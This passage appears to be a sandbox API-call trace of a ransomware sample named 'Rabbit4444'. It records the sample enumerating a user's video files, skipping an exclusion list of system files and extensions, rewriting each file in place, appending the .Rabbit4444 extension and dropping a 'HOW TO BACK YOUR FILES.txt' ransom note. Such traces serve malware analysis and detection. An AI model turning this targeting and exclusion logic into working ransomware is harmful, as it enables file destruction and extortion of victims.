dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.366] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.366] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13967706260) returned 1 [0048.366] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=40898) returned 1 [0048.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0048.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0048.366] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa2d0, lpName=0x0) returned 0x298 [0048.367] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa2d0) returned 0x70000 [0048.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0048.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0048.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0048.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0048.369] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13967927943) returned 1 [0048.369] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0048.369] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0048.369] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.369] CloseHandle (hObject=0x298) returned 1 [0048.369] CloseHandle (hObject=0x278) returned 1 [0048.373] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\JPgmUVeD.mp4.Rabbit4444") returned 67 [0048.373] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\JPgmUVeD.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\jpgmuved.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\JPgmUVeD.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\jpgmuved.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0048.374] InterlockedExchangeAdd (in: Addend=0xff618, Value=40912 | out: Addend=0xff618) returned 16080928 [0048.374] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3333 [0048.374] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf33080, ftCreationTime.dwHighDateTime=0x1d4cbf5, ftLastAccessTime.dwLowDateTime=0xee0bee80, ftLastAccessTime.dwHighDateTime=0x1d4d26b, ftLastWriteTime.dwLowDateTime=0xee0bee80, ftLastWriteTime.dwHighDateTime=0x1d4d26b, nFileSizeHigh=0x0, nFileSizeLow=0x2df3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ui7VnDgLzhug.flv", cAlternateFileName="UI7VND~1.FLV")) returned 1 [0048.374] lstrcmpiW (lpString1="Ui7VnDgLzhug.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.374] lstrcmpiW (lpString1="Ui7VnDgLzhug.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.374] lstrcmpiW (lpString1="Ui7VnDgLzhug.flv", lpString2="Rabbit4444.exe") returned 1 [0048.374] lstrcmpiW (lpString1="Ui7VnDgLzhug.flv", lpString2=".") returned 1 [0048.374] lstrcmpiW (lpString1="Ui7VnDgLzhug.flv", lpString2="..") returned 1 [0048.374] lstrcmpiW (lpString1="Ui7VnDgLzhug.flv", lpString2="windows") returned -1 [0048.374] lstrcmpiW (lpString1="Ui7VnDgLzhug.flv", lpString2="bootmgr") returned 1 [0048.374] lstrcmpiW (lpString1="Ui7VnDgLzhug.flv", lpString2="pagefile.sys") returned 1 [0048.374] lstrcmpiW (lpString1="Ui7VnDgLzhug.flv", lpString2="boot") returned 1 [0048.374] lstrcmpiW (lpString1="Ui7VnDgLzhug.flv", lpString2="ids.txt") returned 1 [0048.374] lstrcmpiW (lpString1="Ui7VnDgLzhug.flv", lpString2="NTUSER.DAT") returned 1 [0048.374] lstrcpyW (in: lpString1=0x130eb90, lpString2="Ui7VnDgLzhug.flv" | out: lpString1="Ui7VnDgLzhug.flv") returned="Ui7VnDgLzhug.flv" [0048.374] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\Ui7VnDgLzhug.flv", dwFileAttributes=0x0) returned 1 [0048.374] lstrlenW (lpString="Ui7VnDgLzhug.flv") returned 16 [0048.374] lstrlenW (lpString="Rabbit4444") returned 10 [0048.374] lstrcmpiW (lpString1="gLzhug.flv", lpString2="Rabbit4444") returned -1 [0048.374] lstrlenW (lpString=".dll") returned 4 [0048.374] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0048.374] lstrlenW (lpString=".lnk") returned 4 [0048.374] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0048.374] lstrlenW (lpString=".ini") returned 4 [0048.375] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0048.375] lstrlenW (lpString=".sys") returned 4 [0048.375] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0048.375] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\Ui7VnDgLzhug.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\ui7vndglzhug.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.375] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.375] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13968548241) returned 1 [0048.375] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=11763) returned 1 [0048.375] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0048.375] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0048.375] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3100, lpName=0x0) returned 0x298 [0048.375] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3100) returned 0x70000 [0048.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.376] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.376] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.376] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.376] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.376] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.376] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13968714814) returned 1 [0048.376] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0048.376] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0048.377] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.377] CloseHandle (hObject=0x298) returned 1 [0048.377] CloseHandle (hObject=0x278) returned 1 [0048.378] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\Ui7VnDgLzhug.flv.Rabbit4444") returned 71 [0048.378] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\Ui7VnDgLzhug.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\ui7vndglzhug.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\Ui7VnDgLzhug.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\ui7vndglzhug.flv.rabbit4444"), dwFlags=0x1) returned 1 [0048.379] InterlockedExchangeAdd (in: Addend=0xff618, Value=11776 | out: Addend=0xff618) returned 16121840 [0048.379] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3335 [0048.379] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95c9bdc0, ftCreationTime.dwHighDateTime=0x1d4cb6c, ftLastAccessTime.dwLowDateTime=0x48f6d1f0, ftLastAccessTime.dwHighDateTime=0x1d4cc42, ftLastWriteTime.dwLowDateTime=0x48f6d1f0, ftLastWriteTime.dwHighDateTime=0x1d4cc42, nFileSizeHigh=0x0, nFileSizeLow=0x109ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VuG piDpw9ji.mkv", cAlternateFileName="VUGPID~1.MKV")) returned 1 [0048.379] lstrcmpiW (lpString1="VuG piDpw9ji.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.379] lstrcmpiW (lpString1="VuG piDpw9ji.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.379] lstrcmpiW (lpString1="VuG piDpw9ji.mkv", lpString2="Rabbit4444.exe") returned 1 [0048.379] lstrcmpiW (lpString1="VuG piDpw9ji.mkv", lpString2=".") returned 1 [0048.379] lstrcmpiW (lpString1="VuG piDpw9ji.mkv", lpString2="..") returned 1 [0048.379] lstrcmpiW (lpString1="VuG piDpw9ji.mkv", lpString2="windows") returned -1 [0048.379] lstrcmpiW (lpString1="VuG piDpw9ji.mkv", lpString2="bootmgr") returned 1 [0048.379] lstrcmpiW (lpString1="VuG piDpw9ji.mkv", lpString2="pagefile.sys") returned 1 [0048.379] lstrcmpiW (lpString1="VuG piDpw9ji.mkv", lpString2="boot") returned 1 [0048.379] lstrcmpiW (lpString1="VuG piDpw9ji.mkv", lpString2="ids.txt") returned 1 [0048.379] lstrcmpiW (lpString1="VuG piDpw9ji.mkv", lpString2="NTUSER.DAT") returned 1 [0048.379] lstrcpyW (in: lpString1=0x130eb90, lpString2="VuG piDpw9ji.mkv" | out: lpString1="VuG piDpw9ji.mkv") returned="VuG piDpw9ji.mkv" [0048.379] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\VuG piDpw9ji.mkv", dwFileAttributes=0x0) returned 1 [0048.380] lstrlenW (lpString="VuG piDpw9ji.mkv") returned 16 [0048.380] lstrlenW (lpString="Rabbit4444") returned 10 [0048.380] lstrcmpiW (lpString1="Dpw9ji.mkv", lpString2="Rabbit4444") returned -1 [0048.380] lstrlenW (lpString=".dll") returned 4 [0048.380] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0048.380] lstrlenW (lpString=".lnk") returned 4 [0048.380] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0048.380] lstrlenW (lpString=".ini") returned 4 [0048.380] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0048.380] lstrlenW (lpString=".sys") returned 4 [0048.380] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0048.380] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\VuG piDpw9ji.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\vug pidpw9ji.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.380] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.380] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13969070944) returned 1 [0048.380] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=68095) returned 1 [0048.380] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0048.380] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0048.380] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10d00, lpName=0x0) returned 0x298 [0048.380] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10d00) returned 0x70000 [0048.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0048.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0048.382] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13969308465) returned 1 [0048.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0048.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0048.382] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.383] CloseHandle (hObject=0x298) returned 1 [0048.383] CloseHandle (hObject=0x278) returned 1 [0048.386] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\VuG piDpw9ji.mkv.Rabbit4444") returned 71 [0048.386] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\VuG piDpw9ji.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\vug pidpw9ji.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\VuG piDpw9ji.mkv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\vug pidpw9ji.mkv.rabbit4444"), dwFlags=0x1) returned 1 [0048.386] InterlockedExchangeAdd (in: Addend=0xff618, Value=68096 | out: Addend=0xff618) returned 16133616 [0048.386] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3336 [0048.386] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91b26510, ftCreationTime.dwHighDateTime=0x1d4d3a1, ftLastAccessTime.dwLowDateTime=0xea06bbd0, ftLastAccessTime.dwHighDateTime=0x1d4d16c, ftLastWriteTime.dwLowDateTime=0xea06bbd0, ftLastWriteTime.dwHighDateTime=0x1d4d16c, nFileSizeHigh=0x0, nFileSizeLow=0x14e09, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="znnVwfJyK03KyEgu5yk.flv", cAlternateFileName="ZNNVWF~1.FLV")) returned 1 [0048.386] lstrcmpiW (lpString1="znnVwfJyK03KyEgu5yk.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.386] lstrcmpiW (lpString1="znnVwfJyK03KyEgu5yk.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.386] lstrcmpiW (lpString1="znnVwfJyK03KyEgu5yk.flv", lpString2="Rabbit4444.exe") returned 1 [0048.386] lstrcmpiW (lpString1="znnVwfJyK03KyEgu5yk.flv", lpString2=".") returned 1 [0048.386] lstrcmpiW (lpString1="znnVwfJyK03KyEgu5yk.flv", lpString2="..") returned 1 [0048.386] lstrcmpiW (lpString1="znnVwfJyK03KyEgu5yk.flv", lpString2="windows") returned 1 [0048.386] lstrcmpiW (lpString1="znnVwfJyK03KyEgu5yk.flv", lpString2="bootmgr") returned 1 [0048.387] lstrcmpiW (lpString1="znnVwfJyK03KyEgu5yk.flv", lpString2="pagefile.sys") returned 1 [0048.387] lstrcmpiW (lpString1="znnVwfJyK03KyEgu5yk.flv", lpString2="boot") returned 1 [0048.387] lstrcmpiW (lpString1="znnVwfJyK03KyEgu5yk.flv", lpString2="ids.txt") returned 1 [0048.387] lstrcmpiW (lpString1="znnVwfJyK03KyEgu5yk.flv", lpString2="NTUSER.DAT") returned 1 [0048.387] lstrcpyW (in: lpString1=0x130eb90, lpString2="znnVwfJyK03KyEgu5yk.flv" | out: lpString1="znnVwfJyK03KyEgu5yk.flv") returned="znnVwfJyK03KyEgu5yk.flv" [0048.387] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\znnVwfJyK03KyEgu5yk.flv", dwFileAttributes=0x0) returned 1 [0048.387] lstrlenW (lpString="znnVwfJyK03KyEgu5yk.flv") returned 23 [0048.387] lstrlenW (lpString="Rabbit4444") returned 10 [0048.387] lstrcmpiW (lpString1="Egu5yk.flv", lpString2="Rabbit4444") returned -1 [0048.387] lstrlenW (lpString=".dll") returned 4 [0048.387] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0048.387] lstrlenW (lpString=".lnk") returned 4 [0048.387] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0048.387] lstrlenW (lpString=".ini") returned 4 [0048.387] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0048.387] lstrlenW (lpString=".sys") returned 4 [0048.387] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0048.387] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\znnVwfJyK03KyEgu5yk.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\znnvwfjyk03kyegu5yk.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.387] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.387] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13969806714) returned 1 [0048.387] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=85513) returned 1 [0048.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0048.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0048.387] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15110, lpName=0x0) returned 0x298 [0048.388] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15110) returned 0x70000 [0048.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0048.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0048.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0048.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0048.391] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13970226773) returned 1 [0048.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0048.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0048.392] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.392] CloseHandle (hObject=0x298) returned 1 [0048.393] CloseHandle (hObject=0x278) returned 1 [0048.395] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\znnVwfJyK03KyEgu5yk.flv.Rabbit4444") returned 78 [0048.395] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\znnVwfJyK03KyEgu5yk.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\znnvwfjyk03kyegu5yk.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\znnVwfJyK03KyEgu5yk.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\znnvwfjyk03kyegu5yk.flv.rabbit4444"), dwFlags=0x1) returned 1 [0048.396] InterlockedExchangeAdd (in: Addend=0xff618, Value=85520 | out: Addend=0xff618) returned 16201712 [0048.396] InterlockedExchangeAdd (in: Addend=0xff624, Value=4 | out: Addend=0xff624) returned 3338 [0048.396] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91b26510, ftCreationTime.dwHighDateTime=0x1d4d3a1, ftLastAccessTime.dwLowDateTime=0xea06bbd0, ftLastAccessTime.dwHighDateTime=0x1d4d16c, ftLastWriteTime.dwLowDateTime=0xea06bbd0, ftLastWriteTime.dwHighDateTime=0x1d4d16c, nFileSizeHigh=0x0, nFileSizeLow=0x14e09, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="znnVwfJyK03KyEgu5yk.flv", cAlternateFileName="ZNNVWF~1.FLV")) returned 0 [0048.396] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0048.396] lstrcpyW (in: lpString1=0x130eb90, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.396] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.397] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.397] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.398] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.398] CloseHandle (hObject=0x278) returned 1 [0048.398] CloseHandle (hObject=0x27c) returned 1 [0048.399] GetCurrentThreadId () returned 0xd98 [0048.399] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0048.399] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Videos\\Kagr0", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\Kagr0") returned="C:\\Users\\FD1HVy\\Videos\\Kagr0" [0048.399] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114f70 | out: hHeap=0xe0000) returned 1 [0048.399] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0048.399] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\Kagr0" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\Kagr0") returned="C:\\Users\\FD1HVy\\Videos\\Kagr0" [0048.399] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\Kagr0", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\Kagr0\\") returned="C:\\Users\\FD1HVy\\Videos\\Kagr0\\" [0048.399] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\Kagr0\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\Kagr0\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\Kagr0\\.BFC0E91B00AE8A0620D3" [0048.399] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\kagr0\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.401] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.404] FlushFileBuffers (hFile=0x27c) returned 1 [0048.405] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.405] CloseHandle (hObject=0x27c) returned 1 [0048.406] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\Kagr0") returned 28 [0048.406] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.406] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\Kagr0\\*", lpFindFileData=0x130dfe8 | out: 